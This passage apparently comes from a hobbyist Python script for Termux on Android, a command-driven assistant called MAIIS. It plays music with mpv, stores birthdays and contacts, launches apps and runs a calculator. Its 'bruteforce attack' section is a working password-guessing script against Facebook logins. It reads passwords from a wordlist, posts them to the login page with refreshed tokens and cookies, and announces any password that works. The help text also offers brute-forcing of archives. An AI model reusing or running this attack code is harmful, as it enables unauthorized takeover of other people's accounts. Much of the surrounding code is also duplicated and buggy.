v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_sn+' --loop')
				elif loop_sd==5:
					os.chdir('popsongs')
					os.system('ls')
					loop_sn =input('Enter the name of song : ')
					os.system(speak+'playing '+loop_sn+' song')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_sn+' --loop')
					
				elif loop_sd==6:
					os.chdir('Bhajan')
					os.system('ls')
					loop_sn =input('Enter the name of song : ')
					os.system(speak+'playing '+loop_sn+' song')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_sn+' --loop')
				elif loop_sd ==7:
					os.chdir('panjabi')
					os.system('ls')
					loop_sn =input('Enter the name of song : ')
					os.system(speak+'playing '+loop_sn+' song')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_sn+' --loop')
				elif loop_sd ==8:
					os.chdir('othersongs')
					os.system('ls')
					loop_sn =input('Enter the name of song : ')
					os.system(speak+'playing '+loop_sn+' song')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('termux-tts-speak playing '+loop_sn+' song')
					os.system('mpv '+loop_sn+' --loop')
					
				elif loop_sd ==9:
					os.system('termux-tts-speak ok sir as your wish')
					print(yellow+'ok sir as your wish'+end)
			elif c=="play loop playlist":
				os.system('termux-tts-speak ok sir pleas chuse a number')
				print(voilet+'''
				
1. 3dsongs
	
2. sadsongs
	
3. eng
	
4. video
	
5. popsongs
	
6. Bhajan
	
7. panjabi
	
8. othersongs

9. Exit

				'''+end)
				os.chdir('/sdcard/Maiis/')
				loop_ip = int(input('Enter the name of play list : '))
				if loop_ip==1:
					loop_ip2 = '3dsongs'
					os.system(speak+'playing '+loop_ip2+' songs')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					'''+end)
					os.system('mpv '+loop_ip2+' --loop-playlist')
				elif loop_ip ==2:
					loop_ip2 = 'sadsongs'
					os.system(speak+'playing '+loop_ip2+' songs')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					'''+end)
					os.system('mpv '+loop_ip2+' --loop-playlist')
				elif loop_ip==3:
					loop_ip2 = 'eng'
					os.system(speak+'playing '+loop_ip2+' songs')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_ip2+' --loop-playlist')
				elif loop_ip==4:
					loop_ip2 ='video'
					os.system(speak+'playing '+loop_ip2+' songs')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_ip2+' --loop-playlist')
				elif loop_ip==5:
					loop_ip2 ='popsongs'
					os.system(speak+'playing '+loop_ip2+' songs')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_ip2+' --loop-playlist')
				elif loop_ip==6:
					loop_ip2 ='Bhajan'
					os.system(speak+'playing '+loop_ip2+' songs')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_ip2+' --loop-playlist')
				elif loop_ip==7:
					loop_ip2 ='panjabi'
					os.system(speak+'playing '+loop_ip2+' songs')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_ip2+' --loop-playlist')
				elif loop_ip==8:
					loop_ip2 ='othersongs'
					os.system(speak+'playing '+loop_ip2+' songs')
					print( green + '''
keybordkey          action
p                   for pause
j                   for subtitle
up                  reverse
down                frount
back                backward
front               for frontward
l                   for loop
s                   screenshot not working in all devices
i                   for information about song
u                   for ASS subtitle
t                   for increase subposition
r                   for decrease subposition
e                   for increasing panscane
w                   for decreasing panscane
d                   for deintralace
z                   for subdelay decrease
x                   for increase subdelay
v                   for selection of subtitle
m                   for mute
q                   for quit
					''')
					os.system('mpv '+loop_ip2+' --loop-playlist')
				elif loop_ip==9:
					print(green+'ok sir'+end)
					# time.sleep(2)

			elif c=="help": # help section start from here
				os.system('termux-tts-speak showing all command that you can run in maiis')
				time.sleep(1)
				print( green + '''
commands			actions
			
hellow how are you	        talk
			
i am also fine			talk
			
how i am looking                talk
			
wo to ma pahla sa he hu		talk 
			
hellow			        talk
		
hellow maiis			talk
			
i love you			talk
			
could you please silant	        talk
			
kya tum kabhe bahar gyi ho	talk
			
exit				to exit maiis
			
exit maiis			to exit maiis
			
kill				to kill maiis
	
set alarm     		        to set a alarm:not working yet
	
clear                 		to clear the maiis

maiis which is your fav song    talk
	
show weather report		show weather report
	
show my battry status      	showing about battry
	
set termux brightness		setting brightness
	
show call logs 			showing call logs
	
show me about my camara 	showing information about camara
	
show my copied text		showing copied text
	
show my all contect list	list all contect
	
print dilog			printing a perticular dilog
	
download			download a perticular file online
	
get finger info		        information about fingerprint sensor
	
show infrared frequencies	showing infrared frequencies
	
show my location		showing current location
	
play music			music playing
	
pause 				pause music
	
resume				to resume paused music
	
stop				to stop music
	
scane file			to find a file
	
record mic			record a mic
	
show notification    		showing notification
	
remove notification		remove notification
	
show live sensor		showing live sensor
	
send sms			send sms

show sms			to view sms
	
make a call  			to make a call
	
show info about cell  		showing about cell
	
show device info		showing about device
	
show toast			show a toast notification
	
turn torch on 			turn flash on
	
turn torch off 			turn flash off
	
torch sos			sos by flash
	
set wallpaper			to set a wallpaper online or offline
	
show wifi connection info	show about wifi connection
	
turn wifi on			to turn wifi on
	
turn wifi off			toturn wifi off
	
show near by wifi		showing nearby wifi list
	
show sms list 			showing sms list
	
show today dob			showing date of birth
	
add dob				to add a new birthday
	
y				to do nothing
	
add no				to add a number in maiis database
	
backup				to backup the database of maiis
	
bruteforce attack		to make bruteforce attack on a facebook id...

start calculator		to start calculator
	
open app			to open an application in a list
	
set random wallpaper		to choose a random wallpaper and set it

archiver			working with archevers like zip files etc
				or performing bruteforce attack on archverse
			
music player command..........
	
	
command 			     action
	
play 3d songs			     3d songs
			
play sad songs			     playing sad songs
			
play pop songs		   	     playing pop songs
			
play bhajan songs		     playing bhajan songs

play panjabi songs		     playing panjabi songs
			
play other songs		     playing other songs
	
play eng songs			     playing english songs
	
play loop song				playing songs for a infinity time
	
play loop playlist				playing a playlist for a infinity time
	
play video song                      play video as a song


	''')
				print( read + '''
			
				WORNING
Always remember that this is an basic ai system it is still in a devolpnment
donot miss use it and donot be panic if you need any help you can contect
me by my email address and youtube channal email address...
smackerking37@gmail.com and youtube channal= 5M4CK3R H4CKER  youtube channal link.....
https:/www.youtube.com/channel/UCW4eaoQE3AaNVmgUm_2kqdg
			''')
			# help setion end here
			# date of birth section start from here
			# in modification
			elif c=="add dob":
				os.system('termux-tts-speak enter the details of the person whom you want to save the date of birth')
				os.chdir('/sdcard/Android/data/com.maiis.main.files/')
				with open('find.txt' , 'a+') as ap :
					pass
					name_dob=input("enter name of the person :")
					mon_ent=input("enter month in numbers without zeros :")
					date_dob=input("enter date without zero :")
					if mon_ent=='1':
						mon_nm='jan'
					elif mon_ent=='2':
						mon_nm='fav'
					elif mon_ent=='3':
						mon_nm='mar'
					elif mon_ent=='4':
						mon_nm='aprl'
					elif mon_ent=='5':
						mon_nm='may'
					elif mon_ent=='6':
						mon_nm='jun'
					elif mon_ent=='7':
						mon_nm='jul'
					elif mon_ent=='8':
						mon_nm='agu'
					elif mon_ent=='9':
						mon_nm='sep'
					elif mon_ent=='10':
						mon_nm='oct'
					elif mon_ent=='11':
						mon_nm='nov'
					elif mon_ent=='12':
						mon_nm='dec'
					else:
						print(read+"who are you"+end)
						time.sleep(1)
					writ = (len(name_dob))
					if writ=='8':
						ap.writelines('\n')
						ap.writelines('---------------------------------------'+' '+name_dob+' '+date_dob+' '+mon_ent+' '+mon_nm)
						ap.writelines('\n')
					elif writ=='7':
						ap.writelines('\n')
						ap.writelines('------------------------------------'+' '+name_dob+' '+date_dob +' '+ mon_ent+' '+mon_nm)
						ap.writelines('\n')
					elif writ=='6':
						ap.writelines('\n')
						ap.writelines('-------------------------------------'+' '+name_dob+' '+date_dob+' '+mon_ent+' '+mon_nm)
						ap.writelines('\n')
					else:
						ap.writelines('\n')
						ap.writelines('----------------------------------------'+' '+name_dob+' '+date_dob+' '+mon_ent+' '+mon_nm)
						ap.writelines('\n')
				print(green+"done :-) :-) :-) :-) :-)"+end)
				ap.close()
			# date of birth section end here
			# show  date of birth section start here
			elif c=="show dob":
				os.system('termux-tts-speak pleas enter a name to find date of birth')
				os.chdir('/sdcard/Android/data/com.maiis.main.files/')
				with open('find.txt' , 'r') as op :
					pass
					write=input("enter the name of person to find word :")
					p=op.read().find(write)
					s=op.seek(p)
					a=(op.readline())
					os.system('termux-tts-speak date of birth of the person is '+a)
					print(a,end=' ')
			# date of birth section end hera
				op.close()
			# weather report section stsrt here
			elif c=="show weather report":
				os.chdir('/sdcard/Android/data/com.maiis.main.files/')
				with open('weather.txt' , 'r') as weth:
					country = weth.readline()
					os.system("termux-tts-speak please wait to view a weather report")
					country_name_to_check_weather_report=country           # input("input name where you want to check weather report :")
					curl_script='curl wttr.in/'
					os.system(curl_script+country_name_to_check_weather_report)
					os.system("termux-tts-speak sir please turn your phone to landscape mod or you can zoom in or out to see weather report properly")
					os.system("termux-tts-speak sir please turn your phone to landscape mod or you can zoom in or out to see weather report properly")
			# weather section end here
			# archiver section start here
			
			elif c=='archiver':
				os.system('termux-tts-speak pleas wait sir opening archiver section')
				archiver()
			# archiver section end here
			# open app section start here
			elif c=="open app":
				os.system('clear')
				print(read+'''
					Worning : This is still in a devoplment
					
1. Facebook Lite
				
2. Whatsapp
				
3. Via browser
				
4. Youtube
				
5. Play Store
				
6. Chrome
				
7. Open Termux For a Perticular Time 
				
8. Beauty Plus

9. Notpad

10. Quick Edit

11. Hackers Keybord

12. Massanger Lite

13. Apk Editor

14. Bomb Bit Up

15. Bit web server

16. App Lock

17. Apk Tool X

18. Apk Info

19. Camara

					''')
				open_app_name = int(input('Choose the number : '))
				if open_app_name==1:
					print(yellow+'ok sir pleas wait while opening facebook lite'+end)
					time.sleep(1)
					os.system('am start --user 0 -n com.facebook.lite/com.facebook.lite.MainActivity')
					os.system('clear')
					
				elif open_app_name==19:
					print(yellow+'ok sir opening Camara'+end)
					os.system('am start --user 0 -n com.android.camera/com.android.camera.CameraLauncher')
					os.system('clear')
					
				elif c ==18:
					print(yellow+'pleas wait opening apk info'+end)
					os.system('am start --user 0 -n com.intelloware.apkinfo/com.intelloware.apkinfo.MainActivity')
					os.system('clear')
					
				elif open_app_name==17:
					print(yellow+'ok sir opening Apk tol X')
					os.system('m start --user 0 -n per.pqy.apktool/per.pqy.apktool.MainActivity')
					os.system('clear')
					
				elif open_app_name==15:
					print('ok sir opening bit web server')
					os.system('am start --user 0 -n com.andi.serverweb/com.andi.serverweb.ActivityHome')
					os.system('clear')
					
				elif open_app_name==16:
					print('ok sir opening app lock')
					os.system('am start --user 0 -n com.sp.protector.free/com.sp.protector.free.StartActivity')
					os.system('clear')
					
				elif open_app_name==14:
					print('pleas wait while opening bombit up app')
					os.system('am start --user 0 -n bombitup.romreviwer.com.bombitup/bombitup.romreviwer.com.bombitup.splash')
					os.system('clear')
					
				elif open_app_name==13:
					print('pleas wait sir while opening apk editor')
					os.system('am start --user 0 -n com.gmail.heagoo.apkeditor/com.gmail.heagoo.apkeditor.MainActivity')
					os.system('clear')
						
				elif open_app_name==2:
					print('ok pleas wait while opening whatsapp ')
					time.sleep(1)
					os.system('am start --user 0 -n com.whatsapp/com.whatsapp.Main')
					os.system('clear')
						
				elif open_app_name==3:
					print('pleas wait while opening Via Browser')
					time.sleep(1)
					os.system('am start --user 0 -n mark.via.gp/mark.via.ui.activity.BrowserActivity')
					os.system('clear')
						
				elif open_app_name==4:
					print('pleas wait while opening youtube')
					os.system('am start --user 0 -n com.google.android.youtube/com.google.android.youtube.HomeActivity')
					os.system('clear')
						
				elif open_app_name==5:
					print('pleas wait opening play store')
					os.system('Play store am start --user 0 -n com.android.vending/com.google.android.finsky.activities.MainActivity')
					os.system('clear')
						
				elif open_app_name==6:
					print('pleas wait while openig chrome')
					time.sleep(1)
					os.system('am start --user 0 -n com.android.chrome/com.google.android.apps.chrome.Main')
					os.system('clear')
						
				elif open_app_name==7:
					print('pleas enter a time in sec which after you want to open termux ')
					time_termux = int(input('Enter The Time : '))
					time.sleep(time_termux)
					os.system('am start --user 0 -n com.termux/com.termux.app.TermuxActivity')
					os.system('clear')
						
				elif open_app_name ==8:
					print('pleas wait while opening beauty plus')
					os.system('am start --user 0 -n com.commsource.beautyplus/com.commsource.beautyplus.HomeActivity')
					os.system('clear')
					
				elif open_app_name ==11:
					print('ok sir pleas wait while opening hackers keybord')
					os.system('am start --user 0 -n hack.hackit.pankaj.keyboardlisten/hack.hackit.pankaj.keyboardlisten.startingDialog')
					os.system('clear')
					
				elif open_app_name ==12:
					print('ok sir pleas wait while opening massanger lite')
					os.system('am start --user 0 -n com.facebook.mlite/com.facebook.mlite.coreui.view.MainActivity')
					os.system('clear')
				
				elif open_app_name =='':
					print('')
					
				elif open_app_name ==9:
					print('please wait while opening notepad')
					time.sleep(1)
					os.system('am start --user 0 -n com.itel.notepad/com.itel.controller.DashboardActivity')
					os.system('clear')
					
				elif open_app_name ==10:
					print('print please wait while opening Quick Edit'+end)
					time.sleep(1)
					os.system('am start --user 0 -n com.rhmsoft.edit/com.rhmsoft.edit.activity.MainActivity')
					os.system('clear')
					
				else:
					print(read+'pleas enter a valid number'+end)
					
			elif c =="set random wallpaper":
				print(green+'ok sir'+end)
				os.system('am start --user 0 -n com.itel.iwallpaper/com.itel.iwallpaper.MainActivity')
				os.system('clear')
			#alarm section start here
			elif c=="set alarm":
				print(yellow+"Set a time for the alarm (Ex. 06:30 or 18:30:00)"+end)
				os.chdir('/sdcard/Android/data/com.maiis.main.files/')
				with open('alarm.txt' , 'w') as ope :
					pass
					alarm_seection=input(" Enter Time >>>")
					ope.writelines(alarm_seection)
					# print("press enter to continue")
					os.chdir('/sdcard/Android/data/com.maiis.main.files/')
					os.system('python pac.py &')
				print("done :-) :-) :-) ")
		# alarm section are completed
				# and alarm section end here
				ope.close()
			# adding number section start here
			elif c=="add no":
				os.system('clear')
				os.chdir('/sdcard/Android/data/com.maiis.main.files/')
				with open('datab.txt' , 'a+') as dpi :
					pass
					name_dobi = input(green+"enter name of the person :"+end)
					time.sleep(1)
					number_op = input(yellow+"enter the number of person :"+end)
					time.sleep(1)
					# dp.writelines('\n')
					dpi.writelines('---------------------------------------'+' '+name_dobi+' '+number_op)
					dpi.writelines('\n')
					print("done add"+' '+name_dobi+' '+"with number"+' '+number_op+' '+":-) :-) :-) :-) :-)")
			# adding section end here
					dpi.close()
			# backup section start here
			elif c == "backup" :
				verification_backup = input(read+"are you suru want to backup maiis y/n : "+end)
				if verification_backup == "y" or verification_backup == "Y" :
					backup_path = input(voilet+"enter backup path in your sdcard or internal storage with / at the end : "+end+green)
					os.chdir(backup_path)
					
					os.system('ls')
					verify = input(read+"are you sure want to backup here y/n :"+end+green)
					if verify == "y" or verify == "Y":
						os.chdir('/sdcard/Android/data/com.maiis.main.files/')
						os.system('cp'+' '+'alarm.txt'+' '+backup_path)
						os.system('cp'+' '+'datab.txt'+' '+backup_path)
						os.system('cp'+' '+'usp.txt'+' '+backup_path)
						os.system('cp'+' '+'wp.txt'+' '+backup_path)
						#  os.system('cp'+' '+'rec.txt'+' '+backup_path)
						os.system('cp'+' '+'pc.txt'+' '+backup_path)
						os.system('cp'+' '+'database.txt'+' '+backup_path)
						os.system('cp'+' '+'find.txt'+' '+backup_path)
						os.system('cp'+' '+'pass.txt'+' '+backup_path)
						print(yellow+"backup done to"+end+green+' '+backup_path+end+' '+blue+":-) :-) :-) :-) :-)"+end)
					elif verify == "n" or verify =="N":
						print(read+"An earror has occur pleas re enter command"+end)
					else:
						print(read+"pleas enter a valid command"+end)
				elif verification_backup =="n" or verification_backup == "N" :
					print("ok sir")
				else:
					print(read+"pleas enter a valid command"+end)
			# backup section end here
			
			# facebook brute force attack script start from here still in delopnment
			
			elif c == "bruteforce attack":
				
				if sys.version_info[0] !=3: 
					os.system('termux-tts-speak sorry but your phone does not support this tool')
					print(read+'''--------------------------------------
					SORRY BUT YOUR PHONE DOES NOT SUPPORT THIS TOOL
				--------------------------------------
							'''+end)
					sys.exit()
				
				post_url='https:/www.facebook.com/login.php'
				headers = {
					'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
				}
				payload={}
				cookie={}
				
				def create_form():
					form=dict()
					cookie={'fr':'0ZvhC3YwYm63ZZat1..Ba0Ipu.Io.AAA.0.0.Ba0Ipu.AWUPqDLy'}
				
					data=requests.get(post_url,headers=headers)
					for i in data.cookies:
						cookie[i.name]=i.value
					data=BeautifulSoup(data.text,'html.parser').form
					if data.input['name']=='lsd':
						form['lsd']=data.input['value']
					return (form,cookie)
				
				def function(email,passw,i):
					global payload,cookie
					if i%10==1:
						payload,cookie=create_form()
						payload['email']=email
					payload['pass']=passw
					r=requests.post(post_url,data=payload,cookies=cookie,headers=headers)
					if 'Find Friends' in r.text:
						open('temp','w').write(str(r.content))
						print(green+'\npassword is : ',passw+end)
						os.system('termux-tts-speak password founded it is '+ passw)
						return True
					return False
				os.system('termux-tts-speak sir wellcome to facebook bruteforce attack system of me means maiis')
				print(green+'\n---------- Welcome To Facebook BruteForce System of MAIIS----------\n'+end)
				# file=open('passwords.txt','r')
				email=input('Enter Email/Username : ')
				path_password_text = input('Enter Full path of text file without name : ')
				os.chdir(path_password_text)
				os.system('ls')
				name_password_text = input('Enter Full Name Of File : ')
				os.system('termux-ttx-speak please wait attacking on '+email)
				print(blue+"\nTarget Email ID : ",email)
				print("\nTrying Passwords from list ..."+end)
				os.chdir(path_password_text)
				file=open(name_password_text , 'r')
				i=0
				while file:
					passw=file.readline().strip()
					i+=1
					if len(passw) < 6:
						continue
					print(yellow+str(i) +" : ",passw+end)
					if function(email,passw,i):
						break
			# facebook bruteforce attack end here
				# enter session start here
			elif c==" ":
				print('')
			# calculator section start here

			elif c=="start calculator":
				def mainn():
					print(blue+'''
	1. +
				
	2. -
				
	3. /
				
	4. *
				
	5. loop calculator
				
	6. press 0000 to exit
				
	
					'''+end)
					selection_f = int(input(yellow+'Pleas Chuse A number : '))																				
					if selection_f ==1:
						print('ok sir pleas wait')
						add()
						
					elif selection_f ==2:
						print('ok sir pleas wait')
						minus()
					elif selection_f ==3:
						print('ok sir pleas wait')
						devide()
					elif selection_f ==4:
						print('ok sir pleas wait')
						multiply()
						
					elif selection_f ==5:
						print('pleas wait.....')
						time.sleep(1)
						print('please chuse a number to continue')
						loopc()
						
					elif selection_f ==6:
						print('pleas wait')
					elif selection_f ==0000:
						print('ok sir exiting pleas wait...')
						time.sleep(1)
					else:
						print('pleas enter a valid command')
						return mainn()
						
					# mainn end here 
					# loopc start here	
				def loopc():
					
					print('''
	1. +
				
	2. -
				
	3. /
				
	4. *
				
	5. enter 0000 to exit loop
	
					''')
					selection_l = int(input('enter a number : '))
					if selection_l ==1:
						print('enter a numbers to add')
						addl()
					elif selection_l ==2:
						print('ok sir pleas wait')
						minusl()
					elif selection_l ==3:
						print('ok sir pleas wait')
						devidel()
					elif selection_l ==4:
						print('print ok sir pleas wait')
						multiplyl()
					elif selection_l ==5:
						exit()
					else:
						return  mainn()
						
						# loop c end here

				# normal calculator start here
				
				def add():
					add_o = int(input('Enter a first number : '))
					add_t = int(input('Enter a second number : '))
					sum_add = (add_o + add_t)
					print('the sum of the '+str(add_o)+'  and ' + str(add_t) + ' is ' + str(sum_add))
					time.sleep(2)
					return mainn()
					
				def minus():
					minus_o =int(input('Enter a first number : '))
					minus_t  = int(input('Enter a second number : '))
					sum_minus = (minus_o - minus_t)
					print('the minus value of the '+str(minus_o)+' and '+str(minus_t) + ' is ' + str(sum_minus))
					time.sleep(2)
					return mainn()
						
				def devide():
					devide_o  = int(input('Enter a first number : '))
					devide_t = int(input('Enter a second number : '))
					sum_devide = (devide_o / devide_t)
					print('the devided value of ' + str(devide_o) + ' and ' + str(devide_t) + ' is ' + str(sum_devide))
					time.sleep(2)
					return mainn()
					
				def multiply():
					multi_o  = int(input('Enter a first number : '))
					multi_t  = int(input('Enter a second number : '))
					sum_multi = (multi_o * multi_t)
					print('the multiplication value of ' + str(multi_o) + ' and ' + str(multi_t) + ' is ' + str(sum_multi))
					time.sleep(2)
					return mainn()
					
				# normal calculator end here ......
				def addl():
					ad = 0
					while True:
						inad = int(input('enter number : '))			
						print(ad + inad)
						time.sleep(1)
						ad += inad		
						if inad == 0000:
							return mainn()
							
				def minusl():
				# maiis loop minus
					m =int(input(yellow+"Input the first number : "+end+green))
					while True:
						# os.system('clear')
						num=int(input(blue+'Enter number : '+end+read))
						if num==0000:
							print('Ok Sir ....')
							break
							return mainn()
						total =m-num
						m=total;
						print('The Ans. is '+str(total))
				
							
				def devidel():
					de = 1
					while True:
						inde = int(input('enter number : '))			
						print(inde / de)
						time.sleep(1)
						de /= inde		
						if inde == 0000:
							return mainn()
							
				# multiply
						
				def multiplyl():
					mp = 1
					while True:
						inmp = int(input('enter number : '+end))			
						print(inmp * mp)
						time.sleep(1)
						mp *= inmp		
						if inmp == 0000:
							return mainn()
				mainn()
			 #  calculator section end here 
			elif c=="maiis which is your fav song":
				os.system("termux-tts-speak sir whic is your that is mine also")
				os.system('clear')
			elif c=="clear":
				os.system('clear')
				continue
			elif c=="exit":
				print(read+'pleas wait exiting'+end)
				# os.chdir('/sdcard/Maiis/rmrf/')
				os.system('clear')
				exit()
				# os.system('python rmrf.py')
				break
			elif c=="maiis exit":
				os.system('termux-tts-speak ok sir exiting')
				os.system('clear')
				# os.chdir('/sdcard/Maiis/rmrf/')
				# os.system('python rmrf.py')
				exit()
				break
			elif c=="kill":
				os.chdir('/sdcard/Android/data/com.maiis.main.files/')
				os.system('python kill.py')
				
				break
			else:
				print("pleas enter a valid command")
				os.system('termux-tts-speak please enter a valid command you can type help to see command list')

		except KeyboardInterrupt:
			print('')
			os.chdir('/sdcard/Android/data/com.maiis.main.files/')
			with open('wp.txt' , 'w') as wre:
				wre.writelines('0')
			wre.close()
		except FileNotFoundError:
			os.system('clear')
			os.system('termux-tts-speak pleas enter a valid path ')
			print(read+"pleas enter a valid path")
			
		except NameError:
			
			os.system('clear')
			os.system('termux-tts-speak are you donkey enter the right name other wise i will crash your phone')
			print(read+"are you donkey enter the right name other wise i will crash your phone"+end)
			
		except Exception:
			os.system('clear')
			print("")
			print("")
			print( voilet + "the earror is"+ str(Exception))
			
reqcheck()